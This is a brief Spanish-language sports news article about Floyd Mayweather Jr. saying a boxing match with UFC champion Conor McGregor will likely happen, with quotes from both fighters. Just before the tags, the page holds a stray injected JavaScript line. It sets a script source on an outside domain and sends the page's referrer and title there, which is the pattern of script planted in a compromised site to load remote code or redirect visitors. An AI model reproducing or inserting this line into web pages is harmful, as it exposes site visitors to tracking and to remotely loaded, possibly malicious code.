Mayweather ve cerca la pelea contra McGregor

El exboxeador no descarta la posibilidad de enfrentar al Campeón del Ultimate Fighting Championship

El exboxeador estadounidense Floyd Mayweather Jr. @FloydMayweather aceptó que existe la posibilidad de enfrentarse al luchador de artes marciales mixtas de UFC @UFCEspanol , Conor McGregor @TheNotoriousMMA , quien no ha dejado de insistir en querer enfrentar a ‘Money’.

“Están intentando meterme una vez más (al ring). No sé si la pelea contra Conor McGregor va a suceder, pero lo más seguro es que sí”, dijo Mayweather.

Durante el evento llamado ‘Una experiencia con The Notorious Conor McGregor’, el campeón del Ultimate Fighting Championship, destacó su interés por medirse con Mayweather, quien lleva retirado del boxeo desde 2015.

“La próxima vez que pelee, me pararé entre las cuerdas con los guantes puestos. Mis ojos están puestos en una cosa, ésa es Floyd Mayweather. Esa pelea está más que explorada, se ha trabajado desde hace un rato. Es una pelea que la gente quiere, es la pelea que yo quiero”, aseguró McGregor sobre el pleito que estaría en el límite de las 147 o 150 libras.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios